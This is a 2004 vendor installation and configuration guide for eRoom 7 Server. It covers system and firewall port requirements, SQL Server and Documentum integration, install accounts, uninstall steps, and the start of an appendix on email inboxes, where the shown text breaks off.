eRoom 7 Server
Installation and Configuration Guide
Documentum, Inc., a division of EMC
6801 Koll Center Parkway, Pleasanton, CA 94566
(925) 600-6800
COPYRIGHT
Copyright © 1997-2004
Documentum, Inc., a division of EMC
6801 Koll Center Parkway, Pleasanton, CA 94566
(925) 600-6800
Trademarks
Documentum® Documentum RightSite®, Documentum Server®, Docbasic®, Documentum DocPage
Server®, Now You Know®, Documentum WorkSpace®, Documentum SmartSpace®, Documentum
ViewSpace®, AutoRender Pro™, Docbase™, DocInput™, Docobject™, DocPage Builder™, Documentum
4i™, Documentum Administrator™, Documentum CADLink™, Documentum Commerce Server
Integrators™, Documentum Application Server Integrators™, Documentum Content Authentication
Services™, Documentum Content Personalization Services™, Documentum ContentCaster™,
Documentum Corrective Action Manager™, Documentum Desktop Client™, Documentum Developer
Studio™, Documentum DocControl Manager™, Documentum DocLoader™, Documentum DocViewer™,
Documentum Dynamic Content Assembler™, Documentum eConnector for CAD™, Documentum
eConnector™ for IBM WebSphere® (IBM and WebSphere are trademarks of IBM) Documentum
eConnector for SAP™ (SAP is a trademark of SAP AG), Documentum eConnector™, Documentum
eConnector™ for BEA Weblogic® (BEA is a registered trademark of BEA Systems Inc) Documentum
eConnector™ for JDBC, Documentum eConnector™ for ATG Dynamo® (ATG and Dynamo are registered
trademarks of Art Technology Group), Documentum eConnector™ for Lotus Notes® (Lotus Notes is a
registered trademark of Lotus Development Corporation) Documentum eContent Server™, Documentum
Engagement Services™, Document Engagement Server™, Documentum ftpIntegrator™, Documentum
Intranet Client™, Documentum iTeam™, Documentum Reporting Gateway™, Documentum Site Delivery
Services™, Documentum Web Development Kit™, Documentum Web Gear™, Documentum WebCache™,
Documentum Web Publisher™, GMPharma™, GXPharma™, GDPharma™, GSPharma™, Momentum™, Virtual
Document Manager™ (VDM), Documentum Selfrepair™, and eRoom are trademarks or registered
trademarks of Documentum, Inc. in the United States and throughout the world. All other company and
product names are used for identification purposes only and may be trademarks of their respective
owners.
eRoom 7 Server Installation and Configuration Guide | i
Pre-installation Requirements .................................................................................. 1
eRoom Server Versions .................................................................................. 1
System Requirements ................................................................................... 2
Port Requirements ....................................................................................... 3
Additional Requirements for Using eRoom 7 with Windows Cluster Services ................... 3
Additional Requirements for eRoom Enterprise ..................................................... 3
Additional Requirements for eRoom 7 for Microsoft SQL Server ................................. 4
Ensuring Sufficient Disk Space ......................................................................... 6
Setting Up An Install Account .......................................................................... 6
Setting Up a File Server Account ...................................................................... 7
Setting Up a File Server Directory ..................................................................... 7
Installing the Index Server (Advanced Installations Only) ......................................... 8
Shutting Down Applications ............................................................................ 8
Selecting a Web Site ..................................................................................... 8
Installing eRoom 7................................................................................................... 8
To install eRoom 7 for SQL Anywhere ................................................................ 9
To install eRoom 7 for SQL Server ..................................................................... 9
Additional Procedures for eRoom Enterprise .......................................................10
Getting Started Using eRoom 7 ................................................................................13
For More Information................................................................................... 13
eRoom and NT Server Default Permissions .................................................................14
eRoom 7 Rights and NTFS Rights ......................................................................14
Checking eRoom Permissions.......................................................................... 14
Uninstalling eRoom 7 .............................................................................................. 14
Appendix A: Configuring eRoom Inboxes ...................................................................16
Creating an SMTP Mail Account on a Mail Server for eRoom Usage .............................16
Administrative eRoom Inbox Settings ................................................................16
How do end users direct email to particular inboxes? ............................................16
Conversion of Mail Messages to eRoom Inbox Pages ...............................................17
Appendix B: Configuring a Reverse Proxy Server with eRoom 7 ....................................18
Configure the Reverse Proxy Server ..................................................................18
Configure the eRoom Web Server ....................................................................19
Notes ......................................................................................................19
eRoom 7 Server Installation and Configuration Guide | 1
Appendix C: eRoom Security Guidelines .................................................................... 21
eRoom Server Operating System Hardening ........................................................ 21
eRoom Security ..........................................................................................21
Using eRoom within an Internal Network ...........................................................22
Using eRoom in the Extended Enterprise ........................................................... 23
Appendix E: Clustering Environment Setup ................................................................28
Before You Begin ........................................................................................28
Clustering Overview ....................................................................................28
Requirements ............................................................................................30
Operating System, Network, and Disk Installation .................................................31
Cluster Service Setup ...................................................................................32
eRoom Software Installation ..........................................................................33
Applying eRoom Maintenance Releases to the Cluster Environment ............................34
Adding a Failed Web or Database Cluster Node Back to the Cluster ............................34
Additional Resources ...................................................................................35
Appendix F: Troubleshooting Problems with Web Publisher .........................................36
eRoom 7 Server Installation and Configuration Guide | 2
PREFACE
In addition to installation instructions, the eRoom 7 Installation and Configuration Guide
covers the following topics:
•
configuring eRoom Enterprise
•
installing with with clustering services
•
Microsoft SQL Server configurations
•
setting up your initial facility and adding eRoom members
•
complete uninstall instructions
•
server components and locations
•
information about default permissions
•
configuring inboxes
•
configuring a reverse proxy server
•
security guidelines
eRoom 7 Server Installation and Configuration Guide | 3
Pre-installation Requirements
Pre-installation Requirements
eRoom Server Versions
Requirements for eRoom 7 vary depending on the type of eRoom 7 installation and the type
of database you use. eRoom 7 is available in two different installations:
Standard installation
The Standard installation is limited in the number of servers that can be used. Typically,
the eRoom 7 server (web server), and file server reside on the same machine, although the
file server directory can be placed on a separate machine from the eRoom 7 server. (If you
have the SQL Server version of the Standard installation, the database server can also
reside on a different machine.)
The Standard installation is available in two different database versions:
•
One provides an embedded SQL Anywhere database.
•
One lets you use Microsoft’s SQL Server, which includes support for SQL Server 2000.
“eRoom 7 for SQL Server” refers to this version. The SQL Server version can be installed
in an environment that uses Microsoft Windows Cluster Services. (Configuring eRoom 7
to take advantage of this service requires some extra Windows environment procedures.)
Advanced installation
The Advanced installation is a multi-server version, in which the web server, indexing
server, database server, and file server can reside on different machines, and there can be
multiple web and database servers. The Advanced installation can only be used with SQL
Server. It can be installed in an environment that uses Microsoft Windows Cluster Services.
(Configuring eRoom 7 to take advantage of this service requires some extra Windows
environment procedures.)
eRoom 7 Server Installation and Configuration Guide | 1
Pre-installation Requirements
System Requirements
Hardware
Client
Server(s)
For browser-only access (“thin
client”), system requirements are
that of the browser itself.
• 900 MHz single processor
For browser access with the plug-in
(“rich client”):
• 300 MHz Pentium
• 128 MB RAM
• 50 MB free disk space
Software
• 512 MB RAM
• 512 MB free disk space (for eRoom
server). File server disk space
requirement depends on usage.
Index server requirement is
approximately 50% of total file
usage.
Note: in the Standard installation,
your database and index server are on
the same machine as your eRoom
server, requiring more disk space.
The following can be used with either
the thin-client or the optional plugin:
• Windows 2000 Server (with Service
Pack 2 or later)
• Microsoft Windows 2000
• Windows 2000 Advanced Server
(with Service Pack 2 or later)
• Microsoft Windows 2003
• Microsoft Windows XP®
• Microsoft Windows NT® 4.0 (with
Service Pack 6a)
• Microsoft Windows 98
• Microsoft Windows ME
The following can be used with the
thin-client only:
• Windows Server 2003 Standard
• Windows Server 2003 Enterprise
The following can be used for nonproduction (evaluation) use only:
• Windows 2000 Professional
• Windows XP Professional
• Microsoft® Windows® 95 (with
Service Pack 1)
• Macintosh OS 8.5 or 9.x
• Macintosh OS X
• Sun Solaris 2.7 or higher
• HP-UX 10.20 or higher
• Linux RedHat 7.x
Supported browsers:
Supported database platforms:
• Microsoft Internet Explorer® 5.0.1
or higher
• Embedded SQL Anywhere database
• Netscape Navigator® 4.7 and
higher. (Note: Navigator® 4.7 and
6.0 provide browser-only access.)
• Netscape 7.0 or higher or Mozilla
1.0 or higher can be used with the
rich client, but Internet Explorer
5.0.1 must be installed on the
machine.
2 | eRoom 7 Server Installation and Configuration Guide
• Microsoft SQL 2000 (Service Pack 1;
Service Pack 2 recommended
Pre-installation Requirements
`Note:
The above requirements are minimums for production environments. In some
cases, requirements are lower for evaluation or other non-production purposes.
Port Requirements
If you are using eRoom 7 with a separate file server that resides behind a firewall, or if you
are using eRoom 7 for SQL Server and the SQL server resides behind a firewall, there are a
few unique firewall port requirements you should be aware of:
•
For eRoom 7 for SQL Server, the use of Microsoft Distributed Transaction Coordinator
(DTC) is required. DTC ensures transactional integrity when eRoom 7 writes to both the
site database and to an eRoom database. DTC requires the following open ports:
- 135 RPC EPM (End Point Mapper)
- 1433 TDS SQL (for TCP/IP traffic)
- 1434 SQL 2000 (for Integrated Security)
- 5100-5200 MSDTC (Dynamically assigned)
•
If your site uses a separate file server that resides behind the firewall, then the following open ports are required:
- 137 NETBIOS Name Service (for browsing requests of NetBIOS over TCP/IP)
- 138 NETBIOS Datagram Service (for Browsing datagram responses of
NetBIOS over TCP/IP)
- 139 NETBIOS Session Service. (For file sharing and print sharing)
- 445 Common Internet File Systsem (CIFS)
Additional Requirements for Using eRoom 7 with Windows Cluster Services
If you are going to use eRoom 7 in conjunction with Microsoft Windows Cluster Services, the
following requirements also apply:
•
Windows 2000 Advanced Server only
•
Active/passive cluster pairs only (not active/active)
•
Microsoft SQL Server (not Sybase), separate or same server
•
Hardware configurations in which Clustering Services are supported for Windows (see
http://www.microsoft.com/hcl/)
•
For information on setting up a clustering environment in preparation for installing
eRoom 7, see Appendix E: Clustering Environment Setup, on page 28.
Additional Requirements for eRoom Enterprise
If you are going to use eRoom Enterprise (an integrated environment consisting of eRoom 7
and Documentum’s Content Server ECM system), the following requirements also apply:
eRoom 7 Server Installation and Configuration Guide | 3
Pre-installation Requirements
•
You must use version 7.0.2 of eRoom.
•
If you use eRoom for SQL Server, and you already have a SQL server set up for use by
Documentum, you must create a new instance of the SQL server for use by eRoom. This
is necessary because Documentum requires a case-sensitive sort order, while eRoom
requires a case-insensitive sort order.
•
Documentum Foundation Classes (DFC) version 5.1 or greater must be installed on each
machine where the eRoom 7 server software is installed. A DFC installer is available for
download with eRoom 7.
•
In order to use eRoom 7 with Documentum Web Publisher, you must install a copy of Web
Publisher version 5.2 or later on the eRoom server. eRoom 7 only needs to access Web
Publisher files; Web Publisher does not need to run on the eRoom server.
•
If you want to make Documentum templates available for users who publish eRoom 7
files to Documentum, you will need to create dedicated template folders within the
Documentum Docbases eRoom 7 will use.
•
You must create a dedicated Documentum account with superuser privileges for each
Docbase that will be used by eRoom 7.
•
The Documentum Connector must be enabled on the eRoom 7 Site Settings page, as well
as the Community Settings page for any community that will use eRoom Enterprise.
•
You must increase the DFC resources used for connecting the eRoom 7 server and the
Documentum server by editing the dmcl.ini file within DFC.
•
If you are going to use Documentum’s Webtop interface, and you are running Webtop
5.1, you must also install the Webtop patch provided on the Documentum site along with
the eRoom 7 and DFC downloads. (Webtop requires an Internet Explorer 5.5 or later
browser.)
•
If you need Thumbnail or Rendition support, Documentum Media Services version 5.1 or
greater must be installed an configured to work with Content Server.
•
If you want to display within eRoom the properties of eRoom items that are linked to
Documentum’s Content Server, you must install the eRoom WDK Component. This is not
strictly required for using eRoom Enterprise, but it is necessary if you want to access the
properties of linked items from within eRoom.
For additional information on these requirements and on configuring eRoom 7 to work with
Content Server, refer to the section Additional Procedures for eRoom Enterprise, on page
10 in this guide.
Additional Requirements for eRoom 7 for Microsoft SQL Server
System requirements
If you are going to use the eRoom 7 for Microsoft SQL Server database version, the following
requirements also apply:
4 | eRoom 7 Server Installation and Configuration Guide
Pre-installation Requirements
•
Although eRoom can log into an existing account, we recommend creating a new SQL
Server account specifically for eRoom to use. The account must use SQL Server authentication, not Windows NT authentication, and must at least have dbcreator rights to
install.
•
For performance reasons, we recommend installing Microsoft SQL Server and eRoom 7
for SQL Server on different machines on the same NT network and same domain, or any
fully-trusted domain.
•
If you decide to install SQL Server on a separate server, you must install some additional
items on the eRoom 7 server machine. In particular, you must install the Client Connectivity option found on the Microsoft SQL Server installation CD. For Microsoft SQL 2000,
you must also install the Management Tools option. Reboot the web server after installing the SQL Client software.
•
SQL Server defaults to port 1433 but this port can be changed, if appropriate.
•
If your SQL server resides behind the firewall, you must use Microsoft Distributed Transaction Coordinator (DTC) to ensure transactional integrity. (See the Port Requirements
section for additional details.)
•
For optimal eRoom performance, set the SQL Server to communicate with client applications using TCP/IP. To confirm this setting, choose from the Start menu Programs >
Microsoft SQL Server 7.0 > Client Network Utility, and then set the Default Network
Library to “TCP/IP”. To do this, make sure only the TCP/IP protocol is enabled in the
General tab of the SQL Server Client Network Utility.
•
You should stop the Microsoft SQL Server services and apply any required service packs.
You can download the service packs from the location http://www.microsoft.com/
download.
From the registry, you can find out which version of Microsoft SQL Server you are
running. Check the product version of sqlservr.exe,which should be 7.00.842:
HKLM\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\CurrentVersion\CSDVersion
•
Microsoft SQL Server must be installed with the following Microsoft defaults:
- Character Set: 437 U.S. English
- Sort Order: 1252 ISO character set, 52 nocase_iso Dictionary order, caseinsensitive. (Other sort orders like binary are not supported. To verify SQL
Server sort order, from the MS SQL Query Analyzer run the SQL Statement
sp_helpsort.)
- Unicode Collation: 1033 General Unicode
- Unicode Style: Case-Insensitive
•
On the same web server where the eRoom Server software will be installed, install (from
the Microsoft SQL Server installation CD) the SQL Server Client Network Utility and, for
Microsoft SQL Server 2000, management tools.
Information you should collect
The eRoom 7 installation asks for three things related to your Microsoft SQL Server:
eRoom 7 Server Installation and Configuration Guide | 5
Pre-installation Requirements
•
Server Name - Choose or type the name of the machine on which Microsoft SQL Server is
running.
•
User Name - Enter the login ID for the account you want eRoom to use.
•
Password - Enter the password for the above login ID.
Ensuring Sufficient Disk Space
It is important to ensure that your eRoom installation (including the file server, index
server, and server data) has room to grow. The files and directories that will grow in size
depend on whether you have the Standard installation of eRoom 7 or the Advanced
installation.
Version
Disk partition recommendations
Standard
Installation, SQL
Anywhere
Use separate partitions for the following and make sure they have sufficient
room to grow:
Standard
Installation, SQL
Server
Advanced
Installation, SQL
Server
•
the File Server directory you specify
•
the eRoom Data directory (on SQL Anywhere, this
includes the site and facility databases, the full-text
search databases, and the optional log files)
Use separate partitions for the following and make sure they have sufficient
room to grow:
•
the File Server directory you specify
•
the site and facility databases
•
the eRoom Data directory (on SQL Server, this includes
the full-text search databases and the optional log
files)
Use separate partitions for the following and make sure they have sufficient
room to grow:
•
the File Server directory you specify
•
the eRoom Data directory (in this version, this includes
only the optional log files, which are not very large,
and--if you are using eRoom Enterprise--a Documentum
Foundation Classes working directory.)
Setting Up An Install Account
All installations
For both Standard and Advanced installations of eRoom 7, the Windows account used to
install the eRoom software must have administrative rights for the server and must also
have “Act as part of the operating system” rights. If this right is not set, the eRoom install
will set it and prompt you to log out then log in again.
6 | eRoom 7 Server Installation and Configuration Guide
Pre-installation Requirements
Advanced installations only
Because an eRoom 7 Advanced installation spans multiple servers connected to a single
site, we recommend that you set up a dedicated Windows account for installing and
administering eRoom 7.
This account should be a domain-level account that is added to the local administrator’s
group on the server(s). By making this a domain-level account, you ensure that the login is
common across multiple servers and the user credentials will be identical. In the case of
servers located within a DMZ (not on a domain), create a local account and use a standard
naming convention for install accounts across all servers.
Setting Up a File Server Account
Standard installations only
If you intend to store files uploaded to eRoom 7 in a directory on the eRoom 7 server itself,
then you do not need to set up a File Server account for the Standard Installation. However,
if you intend to store your File Server share on a different machine than eRoom 7, you must
set up an account (either domain or local) for access to the File Server. The account does
not need any special Windows rights (administrative rights, for example).
Advanced installations only
For all Advanced installations, you must create a Windows account for eRoom 7 to use to
access the File Server share (the location where eRoom 7 files are uploaded and stored).
The account should be a domain account, unless you are installing eRoom 7 within a DMZ.
The account does not need any special Windows rights (administrative rights, for example).
Setting Up a File Server Directory
All installations
All eRoom 7 installations require a File Server directory to contain uploaded files. Because
the Site Creation wizard will prompt you for this directory after you install eRoom 7, you
should create this directory before launching the install.
In addition, you must also share the File Server directory via Windows file sharing (unless
you are both placing the File Server directory on the same machine as eRoom 7 and
performing a Standard installation). The only account that needs share access to the File
Server directory is the File Server account discussed in the previous section.
`
Note: If you create the File Server directory on a shared drive on a cluster configuration,
then you must also create a clustered file share resource for this shared drive in the Cluster
Group. This resource will need the permissions set up for the File Server account to access
the data files. Otherwise, the shared drive will not be available after a failover.
eRoom 7 Server Installation and Configuration Guide | 7
Installing eRoom 7
Installing the Index Server (Advanced Installations Only)
If you intend to perform an Advanced installation, you should prepare for this installation
by downloading and running the index server setup program on the machine you would like
to use as an index server. (This setup file is listed as the eRoom 7 Search Engine Installation
and is located with the eRoom 7 files on the Documentum download site.) When you create
an eRoom 7 site, you will be asked for the name of the index server. You can then enter the
name of the machine on which you installed the index server.
If you install the index server after creating the eRoom 7 site, or if you do not enter the
name of the index server when you create the eRoom 7 site, then you will need to add the
index server (once installed) to the eRoom site by means of the eRoom 7 Admin utility.
Shutting Down Applications
To install the eRoom Server, close all applications temporarily. Disable virus scanners during
the installation. Restart applications after installation and re-enable virus scanners.
Selecting a Web Site
When you install eRoom Server, you are prompted for a web site on which to install eRoom.
You can use the default web site, or you can use an additional web site that you created
within IIS. Refer to IIS online documentation for information about how to set up IIS with
multiple web sites. eRoom recommends testing an additional web site configuration before
installing the eRoom software.
Installing eRoom 7
This section explains how to install eRoom 7. If you are upgrading from a previous version
of eRoom 7, refer to the eRoom 7 Server Upgrade and Configuration Guide. Once the
eRoom 7 files are installed, and your server has re-booted, the install program will lead you
through the steps to set up or join an eRoom site.
An eRoom 7 site consists of one or more servers that support a population of eRooms and
users. All servers in a site share a common membership. Consequently, members can log
into the site and then not have to log in again during the same session--even if they go to
different eRooms and servers. A site can be as small as a single server, but (with the
Advanced installation) can have many servers. A site can be subdivided into multiple
communities.
Installing eRoom 7 onto a server with no previous eRoom installation involves the following
procedures:
•
Running the Setup program to install the software
•
Running the Site Setup program to set up or join an eRoom 7 site
•
Specifying Site Settings
8 | eRoom 7 Server Installation and Configuration Guide
Installing eRoom 7
To install eRoom 7 for SQL Anywhere
1. Log in to your web server under the administrator account you established in the section
Setting Up an Install Account.
2. Download and run the eRoom 7 installer. Only the Standard installation of eRoom 7 is
available for SQL Anywhere.
3. Follow the instructions in the Setup program until the installation completes.
To install eRoom 7 for SQL Server
eRoom recommends installing Microsoft SQL Server and eRoom 7 for SQL Server on different
machines on the same NT network and same domain, or on any fully-trusted domain.
1. Install Microsoft SQL Server before you install eRoom 7 for SQL Server. (Note that binary
sort order is not supported.)
For cluster services only. (Additional detail available in Appendix E: Clustering
Environment Setup, on page 28.)
ƒ
Install Microsoft SQL Server Client (including the management objects) on both
cluster nodes.
ƒ
Change the IIS anonymous user on both nodes to a common domain user (such as
EROOM\CLUSTER_USR). To do this, right-click My Computer and choose Manage /
Services and Applications / Internet Information Services / Default Web Site /
Properties / Directory Security tab / Anonymous access and authentication control,
click "Edit" / Authentication Methods dialog: Anon is selected, click “Edit” / enter
username (for example, CLUSTER_USR).
ƒ
Change the recover settings for IIS Admin and W3SVC services. To do this, right-click
My Computer and choose Manage / Services and Applications / Services / IIS Admin
(and W3svc) / Properties / Recovery tab / Choose “Take no action” from
the“Firstfailure” drop-down list.
2. On the same server where the eRoom Server software will be installed, install (from the
Microsoft SQL Server installation CD) the SQL Server Client Network Utility and, for
Microsoft SQL Server 2000, management tools.
ƒ
Although eRoom can log into an existing account if you prefer, we recommend
creating a new SQL Server account specifically for eRoom to use.
ƒ
The account must use SQL Server authentication, not Windows NT authentication,
and must have dbcreator rights.
ƒ
Apply any Microsoft SQL Server Service Packs (stop the Microsoft SQL Server services
first). Reapply any NT service pack after applying the SQL Server Service Packs. You
can download Service Packs from:
http://www.microsoft.com/download
ƒ
Before installing eRoom 7 for SQL Server, test your connection to the Microsoft SQL
Server using the SQL Server Client Network Utility.
eRoom 7 Server Installation and Configuration Guide | 9
Installing eRoom 7
3. Log in to your web server under the administrator account you established in the section
Setting Up an Install Account.
For cluster services only. To install, move the cluster group to this node (if this is not
already the active node).
4. Download and run the preferred eRoom 7 for SQL Server installer. Both the Standard
installation and Advanced installation of eRoom 7 are available for SQL Server.
For cluster services only. (Additional detail available in Appendix E: Clustering
Environment Setup, on page 28.)
Install eRoom on the first node, placing all eRoom program files, eRoom web site files,
and data on the shared drive. The following locations are recommendations:
ƒ
eRoom Web directory: <Shared Drive>:\inetpub\eRoom
ƒ
eRoom Server Administration directory: <Shared Drive>:\eRoom\eRoom server
ƒ eRoom Server Data directory: <Shared Drive>:\eRoom Data
Install eRoom on the second node:
ƒ
Move the cluster group from the first node to the second node.
ƒ
Install eRoom. You will not be prompted for the location of eRoom files, since that
information was entered during the first install.
ƒ
The eRoom install will create a facility with an initial set of eRooms.
5. Follow the instructions in the Setup program until the installation completes.
If you are planning to use eRoom Enterprise, you must also complete the procedures in the
following section. Otherwise, see the section Getting Started Using eRoom 7, on page 13.
Additional Procedures for eRoom Enterprise
If you are planning to use eRoom Enterprise, which combines eRoom 7 with Documentum’s
Content Server, you must also complete the procedures in this section.
Installing DFC on the eRoom 7 server
Documentum Foundation Classes (DFC) must be installed on the same server(s) as eRoom 7.
A DFC installer is available for download with eRoom 7.
1. Log in to your web server as administrator.
2. Download and launch the DFC installer.
3. Follow the instructions in the Setup program until the installation completes.
4. After the Setup program is finished, you must re-boot.
10 | eRoom 7 Server Installation and Configuration Guide
Installing eRoom 7
5. Edit the dmcl.ini file for DFC to increase the resources used for connecting the eRoom 7
server and the Documentum server.
The dmcl.ini file resides in the \WINNT directory of the machine on which you are
installing DFC. Edit it by adding the following lines:
[DMAPI_CONFIGURATION]
cache_queries = T
client_codepage=UTF-8
client_cache_size=1000
connect_pooling_enabled=T
max_session_count=100
max_collection_count=100
(You can also find a copy of these lines in the ...eRoomServer\dmcl_settings.txt file of
your installed copy of eRoom 7.) These settings are the recommended minimums.
6. If you are installing the DFC after installing eRoom 7, you must run the eRoom Checker
to configure the correct permissions on Documentum-related files and folders. Locate
the ERChecker executable in the ...\Program Files\eRoom\eRoom Server directory and
specify a check for General Site Consistency and All File Permissions.
Creating a dedicated eRoom 7 template folder
If you want eRoom 7 users to be able to choose Documentum template files when
publishing a file to Documentum, you must create a folder for the template files within
each Docbase that will be used by eRoom 7. The folder(s) must meet the following criteria:
•
They must be named eRoom Templates and placed within the /System cabinet of the
Docbase.
•
They must have world write access.
Creating dedicated content server accounts
You must create a dedicated Content Server account with superuser privileges for use by
eRoom 7. The account must be created for each Docbase that eRoom 7 will access, and the
account login name and password must be the same for each Docbase. (eRoom accepts only
one login and password for Documentum access.)
Be sure to make a note of the login name and password for the account(s) you create, so
that you can enter them on the eRoom 7 Server Settings page.
The two most convenient ways to add a single user to a Docbase are to use either the
Documentum Administrator utility or the Webtop utility (if available at your site). For
information on adding a user account with Documentum Administrator, refer to the
Documentum Content Server Administrator’s Guide. For information on adding a user
account with Webtop, refer to the Documentum Using Webtop manual.
Enabling use of content server by eRoom 7
Once both eRoom 7 and DFC are installed on the server and you have created a dedicated
Documentum Administration account, you must enable use of eRoom 7 with Content Server
on the eRoom Site Settings page.
You can get to the Site Settings page in one of two ways:
eRoom 7 Server Installation and Configuration Guide | 11
Installing eRoom 7
•
remotely, by entering in your browser the URL servername.com/eRoom, then go to Site
Settings.
•
locally, by using the Microsoft Management Console (MMC)—choose Start > Programs >
eRoom Administration > eRoom Server Administration
1. On the eRoom 7 Site Settings page, click the General tab, then scroll down to the Documentum section.
2. Make sure the Enable Documentum Connector checkbox is selected.
3. Enter the Login name and Password for the dedicated Content Server account you created for your Docbase(s).
4. Specify any other options you prefer for the remaining Documentum settings. (For
example, if you are going to use Documentum’s Webtop interface, enter the Webtop
URL.)
5. Scroll to the top of the Site Settings page and click the Apply button.
6. Scroll down to the Documentum section.
A Test button is now available.
7. Click the Test button to verify that the Login name and Password you have provided
afford access to Documentum.
For details about all Documentum server settings, see the eRoom Administration section of
the eRoom 7 online Help.
Installing Web Publisher on the eRoom server
Web Publisher is an easy-to-use, browser-based interface that enables non-technical users
to easily create, manage, and publish content for multiple, multilingual Web sites. If you
are planning to use eRoom 7 with Documentum Web Publisher, you must also complete the
procedures in this section. In order for the eRoom server to communicate with application
servers running Web Publisher, a copy of Web Publisher must be installed on the eRoom
server. If a supported application server is not already installed on the eRoom server, then
an application server must first be installed before installing Web Publisher.
1. Install a supported application server (for example, BEA WebLogic or Apache Tomcat) on
the eRoom server.
2. Install Web Publisher (Web_Publisher_5.2.x_windows.exe) on the eRoom server.
`Note:
You do not need to run either the application server or Web Publisher on the
eRoom server; you only need to install it there.
If you receive errors when attempting to work with Web Publisher files, or if you are
unable to see Web Publisher files or folders, please see Appendix F: Troubleshooting
Problems with Web Publisher, on page 36.
12 | eRoom 7 Server Installation and Configuration Guide
Getting Started Using eRoom 7
Configuring Web Publisher servers for use with eRoom
In order for “Go to Content Server...” command in eRoom to work correctly with Web
Publisher servers, you must perform the following procedure on each Web Publisher server
that eRoom will connect to.
1. Locate the XML file wp\config\app\contextsensitive_view_config.xml.
2. Open the file, and under the <actions_list> tag enclosed within the <component> tag,
add the following line:
<an_action_name=”search” valid_by_default=’true’/>
3. Log into Web Publisher as a user with administrative privileges.
4. Press the Ctrl key while clicking the Documentum icon in the top-right corner of the
page.
5. Click the Configuration button.
6. Click the “Rec-configure View Sensitive Action” link.
7. Wait until the process finishes, then close the popup window.
Getting Started Using eRoom 7
To learn more about beginning to configure and use eRoom sites and rooms, see the
Welcome to eRoom topic in the eRoom 7 online Help. To open this topic, choose Start>
Programs> eRoom Server> Getting Started with eRoom.
For More Information
Refer to the eRoom 7 online Help for product documentation (for administrators as well as
end users). To open the Help, click “
`
” in the control bar at the top of an eRoom page.
•
For information about new features in eRoom 7, see the What’s new in eRoom 7 topic.
•
For details about the user interface, see the Guided tour in the Working in your
eRoom topic (Basics section).
•
For information about coordinating an eRoom, see the section Coordinating an eRoom.
•
For server and facility administration details, see the Administration section.
•
For information on managing eRoom membership (including the use of NT domain and
LDAP directories), see the Membership section.
See also: Visit the Documentum Support site for additional Support Note information.
eRoom 7 Server Installation and Configuration Guide | 13
eRoom and NT Server Default Permissions
eRoom and NT Server Default Permissions
`
Note: There are default permissions set up for an eRoom installation. Organizational standards may vary from enterprise to enterprise. These permissions can be changed to
“harden” the security of the server. Follow the Microsoft Windows recommendations for
hardening NT or 2000 IIS security. However, any configuration changes should be sufficiently
tested prior to installing eRoom.
eRoom 7 Rights and NTFS Rights
Access rights set in the eRoom application are not passed down as NTFS rights to the
operating system (NT/2000). Conversely, general NTFS permissions for each NT user on the
server do not apply to eRoom objects or files. The eRoom application user rights will
determine access control to the application (communities and eRooms) and rights to
eRoom-specific objects. Windows NTFS permissions that are important are the IUSR
Account (anonymous access account) used by IIS and the eRoom Server user account
created by the eRoom application. Both accounts are used to access server resources.
However, the IUSR account access is limited in scope.
Checking eRoom Permissions
eRoom provides a utility called the eRoom Checker that does a deep permissions check on
the eRoom web server. It checks and lists a detailed permission checklist for the entire
server, including registry and directories for the IUSR and System NT Accounts. In addition,
it checks the integrity of database objects and can make permissions repairs and add
missing facilities and erooms to the site database.
You run eRoom Checker from the eRoom Server Administration MMC console. Please contact
eRoom Technical Support for assistance with running this utility.
`
See also: For more information about the eRoom Checker utility, see the eRoom Diagnostic
and troubleshooting tools section of the System Administration section of online Help.
For more information on Windows NT permissions and security, see the following web
resources:
http://www.microsoft.com/technet/iis/permmaze.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Uninstalling eRoom 7
Use the following procedure to remove everything associated with an install of eRoom 7.
`
Note: Do not perform this procedure if you still have eRoom data you want to save or
recover.
14 | eRoom 7 Server Installation and Configuration Guide
Uninstalling eRoom 7
1. Shut down the eRoom Monitor (if you installed the eRoom client on the same machine as
the eRoom Server).
2. Use the eRoom Server Administration MMC console to delete the site. (Select the eRoom
folder, right click, and choose All Tasks > Delete Site).
3. Uninstall the eRoom Server by opening the Control Panel and double-clicking "Add/
Remove" Programs. Choose eRoom Server and click "Remove". If prompted to remove
files no longer in use, you can select “Yes” at your discretion.
4. After removing eRoom 7 and re-booting, verify the following:
- If your ...\eRoom Data directory (or whatever else you named it during
install) has been removed. If not, remove it (provided a backup isn't
needed or doesn't currently exist).
If you are using Microsoft SQL 2000, then also ensure the eRoom databases
within Microsoft SQL Enterprise Manager have been removed. If not, delete
them.
ƒ
Verify that registry entries have been removed.
- Run Registry Editor. (Start > Run > Regedit)
- Select - HKEY_LOCAL_MACHINE\SOFTWARE\
- Find the eRoom key under the software key.
- Verify that the eRoom key is removed. If not, delete the
HKLM\Software\eRoom\eRoom Server key. Do not do this if you still want to
keep eRoom data.
ƒ
Verify that the eRoom Server files have been removed.
- Go to the following directories and delete the following files if they exist
(these are defaults -- installation locations may vary):
/inetpub/eRoom - remove eRoom directory
ƒ
Verify that all virtual roots have been removed from IIS:
- Open the Internet Service Manager to check all "eroom" roots.
- If any still exist, right-click and delete all the "eRoom" virtual directories/
applications.
ƒ
Make sure that IIS Services are started and that you can access the IIS default home
page. Then you can re-install eRoom if needed.
eRoom 7 Server Installation and Configuration Guide | 15
Appendix A: Configuring eRoom Inboxes
Appendix A: Configuring eRoom Inboxes
An eRoom inbox is a special folder that can receive and store email messages (and their
attachments). By cc'ing email messages about your project to your eRoom, you can create
an automatic archive of project correspondence. To retrieve email messages, eRoom logs
into an SMTP account on a mail server, just as if it were a mail client like Outlook Express
or Eudora.
Creating an SMTP Mail Account on a Mail Server for eRoom Usage
Establishing an SMTP service and domain
1. In the IIS Admin Console on the eRoom server that will host the SMTP service, make sure
the SMTP service is installed.
2. Make sure there is a virtual SMTP domain configured within the IIS Admin Console.
3. In the Incoming section of the Email page of the eRoom Site Settings, enter the name of
the SMTP domain from the previous step into the “Email address domain” field.
Creating the inbox
1. In an eRoom, click create and choose the Inbox item. Provide a name and description
for the inbox.
2. Complete the inbox address by filling in the Address field in front of the domain name.
3. Click OK to create the inbox.
Each inbox you create follows the same process. Multiple inboxes can reside in a single
eRoom. All inboxes must have unique email addresses. eRoom will enforce this by
changing email addresses for inboxes that are copied.
Administrative eRoom Inbox Settings
The eRoom Scheduler Service accesses the SMTP accounts to retrieve mail for all eRoom
inboxes. You can disable the inbox functionality within the eRoom Site Settings page by
clearing the “Check for email sent to inboxes” checkbox under the Scheduler section.
When inboxes are enabled, you can use the eRoom Server Tuning dialog box to set the
